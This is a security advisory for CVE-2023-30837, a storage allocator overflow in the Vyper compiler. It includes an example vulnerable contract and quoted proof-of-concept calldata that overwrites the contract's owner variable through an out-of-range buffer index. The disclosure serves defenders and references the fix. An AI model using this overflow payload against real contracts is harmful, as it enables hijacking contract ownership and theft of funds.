CVE-2023-30837: vyper vulnerable to storage allocator overflow
(updated )
The storage allocator does not guard against allocation overflows. This can result in vulnerabilities like the following:
owner: public(address)
take_up_some_space: public(uint256[10])
buffer: public(uint256[max_value(uint256)])
@external
def initialize():
self.owner = msg.sender
@external
def foo(idx: uint256, data: uint256):
self.buffer[idx] = data
Per @toonvanhove, “An attacker can overwrite the owner variable by calling this contract with calldata: 0x04bc52f8 fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
(spaces inserted for readability)
0x04bc52f8
is the selector for foo(uint256, uint256)
, and the last argument fff...fff
is the new value for the owner variable.”
References
- github.com/advisories/GHSA-mgv8-gggw-mrg6
- github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-76.yaml
- github.com/vyperlang/vyper
- github.com/vyperlang/vyper/commit/0bb7203b584e771b23536ba065a6efda457161bb
- github.com/vyperlang/vyper/security/advisories/GHSA-mgv8-gggw-mrg6
- nvd.nist.gov/vuln/detail/CVE-2023-30837
Detect and mitigate CVE-2023-30837 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →